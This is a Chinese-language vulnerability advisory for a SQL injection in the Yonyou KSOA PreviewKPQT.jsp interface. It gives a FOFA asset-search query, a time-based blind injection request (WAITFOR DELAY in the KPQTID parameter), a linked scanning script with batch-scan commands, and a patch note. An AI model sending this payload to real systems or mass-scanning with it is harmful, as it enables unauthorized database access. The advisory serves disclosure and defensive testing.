用友时空KSOA PreviewKPQT SQL注入漏洞【附poc】

fofa

product="用友-时空KSOA"

资产页面

一、漏洞简述

用友时空OA是用友网络科技股份有限公司推出的一款基于云计算的全新办公自动化系统。它集移动办公、文档协同、工作流程、通讯协作、知识管理等多项功能于一体,旨在帮助企业实现高效的数字化办公管理。用友时空OA支持手机、平板等移动设备随时随地办公,提供文档在线编辑、审批、共享等协同功能,并可通过自定义工作流程管理业务流转。此外,它还集成了即时通讯、视频会议等通讯协作工具,以及企业知识库管理功能,全方位提升企业的信息化办公效率。作为一款云服务,用友时空OA无需企业自行维护服务器,即可实现开箱即用,同时也提供私有云部署选项以满足数据安全需求。总的来说,用友时空OA是一款功能全面、部署灵活的企业级云办公解决方案。其接口PreviewKPQT.jsp存在SQL注入漏洞，攻击者课通过该漏洞获取数据库敏感数据

二、漏洞检测poc

GET /kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: close

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞：

https://github.com/ATonysan/poc-exp/blob/main/KSOA_PreviewKPQT_SQLInject.py

批量检测:

python KSOA_PreviewKPQT_SQLInject.py -f url.txt

单个url检测漏洞:

python KSOA_PreviewKPQT_SQLInject.py -u url

四、修复

官方已更新补丁，请升级至最新版本。

官网地址：https://www.yonyou.com/